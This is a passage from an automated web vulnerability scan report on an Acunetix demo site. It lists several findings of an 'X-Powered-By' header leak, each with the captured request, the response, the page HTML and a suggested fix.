align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        27. POST http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Content-Length: 1415
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1415 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9zWSYY5iwxqgBHXlBfPJ%2F1TT%2FYMA%3D%3D&tbComment=&btnSend=Send+comment
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          
          
          Response body (0 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        28. POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Content-Length: 1721
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1721 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Fpbihq93nLJJrCcGURk6iWNCIK%2BA%3D%3D&tbComment=&btnSend=Send+comment
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          
          
          Response body (0 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        29. POST http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Content-Length: 1539
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1539 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg%2FaWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP%2FMHHnstJY%2FfWtD4cYSdoYkheQ%3D%3D&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9dpx0P1QE7KvkQnKR4Ij212SQ8lw%3D%3D&tbComment=&btnSend=Send+comment
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          
          
          Response body (0 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        30. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a 